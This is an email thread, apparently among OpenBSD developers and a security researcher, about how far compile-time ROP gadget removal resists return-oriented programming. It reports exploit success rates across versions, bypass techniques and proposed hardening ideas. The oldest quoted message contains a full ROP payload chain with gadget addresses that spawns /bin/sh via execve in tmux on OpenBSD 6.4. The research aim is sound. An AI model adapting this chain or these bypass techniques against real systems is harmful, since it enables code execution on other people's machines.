Can you show how you arrived at these results? The more detailed the better.

Perhaps this should be its own blog post somewhere as well.

I can't speak to the suggested experiments other than to say that having a 
wider audience may be of help.


Sent: Saturday, October 07, 2023 at 8:13 PM
From: "Nan ZoE" <>
Subject: Re: ROP Exploitation in openbsd-64 Programs After Removing ROP Gadgets

Thank you very much for all your suggestions first. After our last
discussion, I conducted some additional experiments and gained a more
detailed understanding of the ROP mitigation mechanisms implemented during
the compilation phase of these programs. *I aimed to identify any
shortcomings in these mitigation mechanisms and attempt to improve them*. I
want to continue our in-depth discussion regarding these mitigation

Firstly, we have observed that OpenBSD is dedicated to reducing the number
of effective Gadgets during the compilation phase while resisting ROP
attacks by increasing the complexity of Gadgets. This is a highly
meaningful and practical approach to ROP defense, as it does not incur the
significant performance overhead that techniques like CFI (Control Flow
Integrity) do. Measures like these can be deployed in various application
scenarios, *as they could be applied to programs in IoT devices or network
equipment *(such as firewalls). Based on my knowledge, many vulnerabilities
still exist in these targets, and ROP attack techniques remain the
preferred choice for attackers during exploitation. *These devices often
prioritize rapid response and tend to weaken their security defenses;*
therefore, adding such mitigation measures during the compilation phase
could significantly enhance their security.

Given that our analysis focuses on ROP attack mitigation measures
implemented during the compilation phase, our primary evaluation method
revolves around assessing how ROP attacks can still be executed using only
Gadgets when these measures are enabled. We conducted experiments where we
attempted to search for and chain Gadgets within programs to construct ROP
payloads that achieve the execution of '*execve("/bin/sh", 0, 0)*'. This
evaluation encompasses two aspects: first, the arbitrary memory-write
capability of the Gadget set (initially setting memory values to *'/bin/sh'*),
and second, the capability to set the values of the key registers *rdi,
rsi, rdx*, and *rax *(for setting* rdi, rsi,* and *rdx *as arguments and *rax
*as the system call number). We conducted experiments on OpenBSD 6.2,
OpenBSD 6.5, and OpenBSD 7.3, extracting the minimal program set for each
version. In *OpenBSD 6.2*, out of 87 programs, we successfully generated
ROP for 84 programs, achieving a success rate of *96.55%*. In *OpenBSD 6.5*,
out of 240 programs, we successfully generated ROP for 191 programs, with a
success rate of *79.58%*. In *OpenBSD 7.3,* out of 264 programs, we only
managed to generate ROP for 134 programs, with a success rate of *50.75%*.
We also manually analyzed the reasons for failure to generate each
program's ROP. In most cases, the inability to control specific register
values led to failures. This was due to a limited number of relevant
Gadgets and their complexity. The range of controllable register values was
restricted. It's worth mentioning that, naturally, if the attack
requirements were lowered, such as requiring control over fewer registers,
it might lead to a higher success rate among the programs.

Based on the experimental data we have gathered, it is evident that
OpenBSD's ROP mitigation measures continually strengthen with each
iteration. They have reduced the number of Gadgets within programs and
increased the complexity of using these Gadgets. The decrease in success
rates is the most compelling evidence of this improvement.

Subsequently, we analyzed the reasons for successfully generating ROP in
some programs, which can be summarized in four key points:

1. While many 'ret'-ending Gadgets have been removed, many 'call' and
'jmp'-ending Gadgets remain usable. These Gadgets allow the storage of jump
addresses in both registers and memory.
2. Despite a reduction in Gadgets for data transfer through 'mov'
instructions, numerous Gadgets still feature arithmetic operations. They
rely on leaked register or memory values to assist in setting target
values, often involving straightforward calculations. (When you have
complete control over the value of a register, it can act like a chain
reaction, assisting in controlling more registers.)
3. Gadgets that involve memory read/write operations are handy, albeit
demanding greater control over multiple register values. Once arbitrary
memory reads or writes are achieved, they can lead to chain reactions,
facilitating control over additional registers or memory values.
4. Conditional branch Gadgets can also be utilized.
5. Additionally, some specific bytecodes employ unique exploitation
techniques, such as 'retf,' 'retfq,'
'ret n,' Etc., which enhance the utilization of effective Gadgets by 30%.

After completing these experiments, I am considering better resisting ROP
attacks during compilation. My primary goal is to make Gadgets more
challenging to use. While human capability is formidable, we can make this
task more difficult. I have some ideas and would like to know if they are

1. *Zeroing registers before function returns:* I have noticed a
mitigation measure mentioned in a paper titled 'Clean the Scratch
Registers: A Way to Mitigate Return-Oriented Programming Attacks.
 It involves clearing
registers before each function returns. It offers two main advantages: a)
significantly reduces the prevalence of 'pop xxx ret' type Gadgets in the
program, and b) when hijacking control flow after triggering a stack
overflow vulnerability, attackers cannot use leaked register values for
supplementary attacks because they have all been zeroed.
2. *Increasing the number of data dependencies and side-effect fixing
items for individual Gadgets:* By adding 'redundant instructions' or
using other methods before jump instructions, we can lengthen Gadgets,
thereby increasing the number of data dependencies and side-effect fixing
items that need to be satisfied for a single Gadget. For example, in the
Gadget 'mov rdx, rax; mov qword ptr [rcx], rdx; test rax, rax; jne
0xdeadbeef; call [rbx + 0x30];,' if we use it for data transfer from rax to
rdx ('mov rdx, rax;'), the other instructions in the Gadget ('mov qword ptr
[rcx], rdx; test rax, rax; jne 0xdeadbeef;') become side-effects, and the
jump address is memory-controlled, serving as data dependencies (the 'call
[rbx + 0x30];' instruction). These side-effects and data dependencies must
be controlled within specific ranges, ensuring the Gadget does not crash
during execution.
3. *Increasing the ratio of conditional branch Gadgets:* Analyze whether
the bytecode for conditional branches relates to certain registers or
instructions. Adjust the compilation scheme without affecting performance
to increase the ratio of conditional branch Gadgets. Such Gadgets are
challenging to use as they require considering at least three elements:
setting the operand value, satisfying the conditional branch, and
controlling the direction of the jump in the corresponding branch. If the
depth of conditional branches can also be increased, these Gadgets become
even harder to use. Similarly, *increasing the ratio of arithmetic
instruction in Gadgets* also contributes to ROP resistance.
4. *Reducing the occurrence of critical bytecode associated with some
Gadget exploitation techniques (retf, retfq, ret n).*

Best regards,

Nan ZoE <> 于2023年9月23日周六 10:38写道:

> Certainly, I will proceed to test the ROP mitigation measures on OpenBSD
> 7.3. Thank you for your response!
> Best regards,
> ZoE
> <> 于2023年9月23日周六 00:32写道:
>> I'm replying to you off list because I don't want to keep the thread
>> going.
>> Listen, you understand wrong. There's no way other way of saying it and
>> your logic doesn't even make sense. A cursory glance at release pages even
>> shows improvements in these specific areas that you mention.
>> However, I don't want to discourage you from testing mitigations but as
>> Peter and Theo said you really need to put your focus on 7.3 release or
>> -current if you are interested in someone taking you seriously.
>> 7.4 will also be released in the next month or so.
>> Sent: Thursday, September 21, 2023 at 9:50 PM
>> From: "Nan ZoE" <>
>> To:
>> Cc:
>> Subject: Re: ROP Exploitation in openbsd-64 Programs After Removing ROP
>> Gadgets
>> Because, as far as I understand, these ROP mitigation mechanisms seem to
>> have been updated only in the three versions of OpenBSD, namely 6.3 to 6.5
>> <[]>. Of 
>> course, I have also studied some
>> programs under OpenBSD 6.5, and many of them still seem to have the
>> potential to be bypassed.
>> <> 于2023年9月22日周五 12:02写道:
>> > Why are you targeting 6.4? That was released in 2018. So, that's 5 years
>> > and 9 releases since then and another one is happening soon.
>> >
>> >
>> >
>> >
>> > Sent: Thursday, September 21, 2023 at 8:50 AM
>> > From: "Nan ZoE" <>
>> > To:
>> > Subject: ROP Exploitation in openbsd-64 Programs After Removing ROP
>> Gadgets
>> > Hello,
>> >
>> >
>> >
>> > I have read your paper regarding the ROP mitigation mechanism (Removing
>> ROP
>> > Gadgets from OpenBSD), and I find the defense against ROP quite
>> ingenious.
>> > The paper introduces the bytecode for 'ret' as '\xc3,' and its
>> association
>> > with the use of the 'rbx' register was a surprising revelation.
>> > Subsequently, you adjusted the prioritization of the 'rbx' register
>> during
>> > compilation, effectively filtering out a significant number of
>> 'ret'-ending
>> > gadgets. This especially removed many misaligned 'ret'-ending gadgets,
>> and
>> > this technique has been applied to openbsd-63, 64, and 65. While the
>> number
>> > of 'ret'-ending gadgets has been significantly reduced, there are still
>> > numerous 'call'-ending gadgets in the program. Security researchers can
>> > still employ many 'call'-ending gadgets to carry out ROP attacks. Even
>> in
>> > programs of only a few hundred kilobytes, I have found that we can still
>> > invoke the execve("/bin/sh", 0, 0) function using only the available
>> > gadgets in the program, albeit it may require a combination of multiple
>> > gadgets and some effort to achieve. I am curious if there are any
>> further
>> > ROP mitigation measures to address this issue? Additionally, I have
>> > provided an ROP attack example targeting the tmux program in
>> OpenBSD-64, as
>> > shown below.
>> >
>> >
>> >
>> > payload = p64(0x4017ce)
>> >
>> > #0x00000000004017ce: pop r13; pop r14; pop r15; ret;
>> >
>> > payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d)
>> >
>> > # 0x000000000040125d: pop rbp; ret;
>> >
>> > payload += p64(0x4017d1)+p64(0x403dd3)
>> >
>> > # 0x0000000000403dd3: xchg eax, ebp; ret;
>> >
>> > payload += p64(0x412208)
>> >
>> > # 0x0000000000412208: mov rcx, r13; call rax;
>> >
>> > payload += b''
>> >
>> > # 0x00000000004017d1: pop rsi; pop r15; ret;
>> >
>> > payload += p64(0x0)+p64(0x40125d)
>> >
>> > # 0x000000000040125d: pop rbp; ret;
>> >
>> > payload += p64(0x40125d)+p64(0x403dd3)
>> >
>> > # 0x0000000000403dd3: xchg eax, ebp; ret;
>> >
>> > payload += p64(0x427a31)
>> >
>> > # 0x0000000000427a31: pop rbx; pop rbp; jmp rax;
>> >
>> > payload += p64(0x49e0ed)+p64(0x0)
>> >
>> > # 0x000000000040125d: pop rbp; ret;
>> >
>> > payload += p64(0x4017d1)+p64(0x403dd3)
>> >
>> > # 0x0000000000403dd3: xchg eax, ebp; ret;
>> >
>> > payload += p64(0x412053)
>> >
>> > # 0x0000000000412053: mov r8, rbx; call rax;
>> >
>> > payload += b''
>> >
>> > # 0x00000000004017d1: pop rsi; pop r15; ret;
>> >
>> > payload += p64(0x0)+p64(0x4551d9)
>> >
>> > # 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret;
>> >
>> > payload += p64(0x4017d3)
>> >
>> > # 0x00000000004017d3: pop rdi; ret;
>> >
>> > payload += p64(0x49e070)+p64(0x40d571)
>> >
>> > # 0x000000000040d571: pop rsi; ret;
>> >
>> > payload += p64(0x0)+p64(0x4017cf)
>> >
>> > # 0x00000000004017cf: pop rbp; pop r14; pop r15; ret;
>> >
>> > payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d)
>> >
>> > # 0x000000000040125d: pop rbp; ret;
>> >
>> > payload += p64(0x49e1d0)+p64(0x42d80b)
>> >
>> > # 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov
>> > rax, r14; call rax;
>> >
>> > payload += b''
>> >
>> > # 0x00000000004017d0: pop r14; pop r15; ret;
>> >
>> > payload += p64(0x0)+p64(0x40125d)
>> >
>> > # 0x000000000040125d: pop rbp; ret;
>> >
>> > payload += p64(0x3b)+p64(0x403dd3)
>> >
>> > # 0x0000000000403dd3: xchg eax, ebp; ret;
>> >
>> > payload += p64(0x407fae)
>> >
>> > # 0x0000000000407fae: syscall;
>> >
>> > payload += b''
>> >
>> >
>> >
>> > Best regards,
>> >
>> > ZoE
>> >
>> > 2023.09.21
>> >

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